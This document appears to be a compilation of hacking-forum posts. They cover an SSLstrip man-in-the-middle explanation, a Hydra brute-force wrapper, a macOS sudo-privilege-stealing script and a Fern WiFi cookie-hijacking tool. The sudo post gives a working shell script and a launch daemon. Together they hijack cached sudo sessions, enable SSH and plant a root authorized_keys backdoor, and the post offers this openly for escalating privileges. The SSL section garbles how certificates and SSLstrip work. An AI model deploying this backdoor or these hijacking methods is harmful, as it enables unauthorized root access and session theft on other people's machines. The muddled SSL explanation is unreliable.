SSL Man In the Middle Attack

how a Man In The Middle (MITM) attacks can be performed over SSL and TSL encrypted data transfer. The attack uses SSL strip developed by Moxie Marlin Spike with a ARP spoofing tool and a packet sniffer. The attack can be exclusively performed from UNIX and Linux based platforms hence I suggest you to use Dsniff. Practically SSL strip was developed to demonstrate how an attacker can lead visitors to visit his/her site from legitimate site. The attack used misinterpretation of null characters vulnerability which existed in several certificates during 2009.

I think its not good to demonstrate how attack can be performed since Moxie Marlin Spike has already provided a nice tutorial on his own website with a video.

Click this link thoughtcrime.org to have a look on tutorial.

Here we gonna discus scene behind attack means why this attack is possible. Following figure demonstrates what happens when your data gets encrypted before it reaches its destination.

As you can see first of all your data goes to the CA authorities (SSL provider) for verification and then actual key exchange takes place, the scenario remains as it is even in LAN. Therefore if an attacker manages to fake out as CA authority it can sniff encrypted connection.

How attacker manages to fake out as authority?

1.First the attacker needs that all traffic in network should pass from his/her system.
2.So he/she performs ARP poisoning attack. (for more info on ARP poisoning read Packer Sniffer section).
3.Now he/she installs SSL strip in his/her system with respect to access point of network.
4.By doing so attacker manages to act as CA authority for all traffic that will pass from his/her system.


What goes behind the scene?
When victim tries to connect remote system using SSL connection. It asks for trust from a CA authority
and when it asks for trust to authority, SSL strip (which is installed in attacker's system) manages to reply with positive response. The SSL strip grants permission for connection using null-termination certificate and it guarantees attacker that the connection will just appear as HTTPS but all data transfer will be done using HTTP. Note that connection would be HTTPS but work as HTTP since null certificate does not provide any security and attacker will successful sniffing packets from SSL connection.

The best countermeasure I can suggest over this kind of attack is installing anti-sniffing and arp spoofing detection tools. And for clients in LAN never ever trust any connection that you would be making from your LAN network.

Hydra bruteforce and dictonary attack script

This is my first script - HidraShok

It is a script to make password attacks alot easier for people. It can do either bruteforcing or dictonairy attacks.

I spent all morning learning how to code this and i wanted to share it with everyone, I couldnt find a section in the forums for scripts but i noticed there was alot of script in this section so i chose to post here (please move if it the wrong section).

version 0.1
It can do a dictonary attack
It can bruteforce
It can use a single username or a list of usernames
You can choose how many tasks to run simultanouisly
You can choose the timeout time
You can choose the wabpage to attack


version 0.2
Fixed a problem in the if statment that executed the final command to run hydra. It was stoping the script working if you had picked password option 1 or 2.
New issue when choosing the option to use text files the script turns the ' into / so it messes up the script. looking for a fix, does anyone know one?




Things i want to do
Add in error detection incase user enters wrong info
More options to define the attack

Stealing SUDO Privs

Some of you may remember we were talking about stealing sudo privs from logged in users some time ago. I'd noticed behaviour on an older Red Hat distro which granted sudo to a user even if it wasn't created by the same session.

Recently a coworker and I have started being childish - whenever someone leaves a machine unlocked, the other changes a background to something not-quite-completely-offensive. As part of that, I decided it was necessary to steal root privileges on the machine, strictly for amusement purposes.

This script is written for a Mac OS X Mountain Lion machine. It works also under Lion. It is ridiculously noisy, generating stacks of logs every couple of minutes while it waits in the background trying to steal sudo privs. There are other alternatives to this method - you could tail the history file until sudo is run, which would be a lot quieter for example.

Regardless, if you have a copy of sudo that accepts the -n switch, you should be able to make it work.

#!/bin/sh

sudo -n id -u > /dev/null
if [ $? -eq 0 ];
then
    (
    sudo systemsetup -setremotelogin on
    sudo dscl localhost -delete /Local/Default/Groups/com.apple.access_ssh
    sudo mkdir /var/root/.ssh && \
    sudo chmod 0700 /var/root/.ssh && \
    sudo chown root:wheel /var/root.ssh && \
    sudo perl -e 'print qq|SSH KEY HERE|;' > /tmp/authorized_keys && \
    sudo mv /tmp/authorized_keys /var/root/.ssh/authorized_keys && \
    sudo chmod 0600 /var/root/.ssh/authorized_keys && \
    sudo chown root:wheel /var/root/.ssh/authorized_keys
    ) > /dev/null
fi

I have it wrapped into a launch daemon:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
    <key>Label</key>
    <string>com.dracyrys.sudograbber</string>
    <key>ProgramArguments</key>
    <array>
    <string>/bin/sh</string>
    <string>/Users/admin/.script/grab.sudo.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>300</integer>
    </dict> </plist>

There are a number of viable options for using this sort of access - in this case I have started SSH and granted root the ability to login with an ssh key.

As always, I'm not supporting the code, merely pointing out that it works in a very new operating environment. sudo on mountain lion is 1.7.4p6

Hopefully you find it interesting, and it helps escalate your privs next time all else has failed you.

Session Hijacking with Fern Wifi Cracker

Fern Cookie Hijacker is a new feature add in Fern Wifi Cracker 1.45 ,it is a wifi based session hijacking tool able to clone remote online web sessions by sniffing and capturing wireless cookie packets from remote hosts by intercepting reachable wireless signals. It is capable of decrypting WEP encrypted packets on the fly to process session cookies transmitted over the air.

Fern cookie Hijacker comes with smart intergrated code to detect and intercept cookie packets, unlike some cookie detection engines fern cookie hijacker does not wait to collect complete cookie acknowledgement during the initial authentication process, but pulls cookies and associate them with their hosts as they are transmitted over the wireless connection, its also forges to correctness values that are not captured e.g (exipry,isSecure).

Heres a video that demonstrates how it works:

Video

The mozilla cookie Sqlite3 database "cookies.sqlite" is no easy task comminucating with, most language api's fail to commmunicate with them due to the fact that mozilla updates their format regularly, this means that and api that is 3.1.5 compliant might not work with a 3.1.6 sqlite database thereby rendering the languages sqlite binding useless at each update..

Communicating with such database returns a deceptive "file is encrypted or is not a database" error. So i search over the internet for a reliable api but i could not find one, so i wrote this generic api by reverse engineering the mozilla firefox program using IDA Pro and OllyDBG,This platform independent api allows commuication with mozillas Sqlite databases by hooking into its DLL or SO objects (libmozsqlite3.so | mozsqlite3.dll) Hooking and using the DLL is important because using the python's sqlite3 library fails to communicate with the cookie database, and also as said earlier firefox changes its database format on each release. This api communicates with the cookie database no matter what changes are made.

API Link:

http://code.google.com/p/fern-wifi-c...cookie_core.py

THIS VIDEO AND SOFTWARE PROGRAM ARE FOR FOR EDUCATIONAL PURPOSES (MITIGATION) ONLY. TESTING IT ON NETWORKS YOU ARE NOT AUTHORIZED TO TEST IS ILLEGAL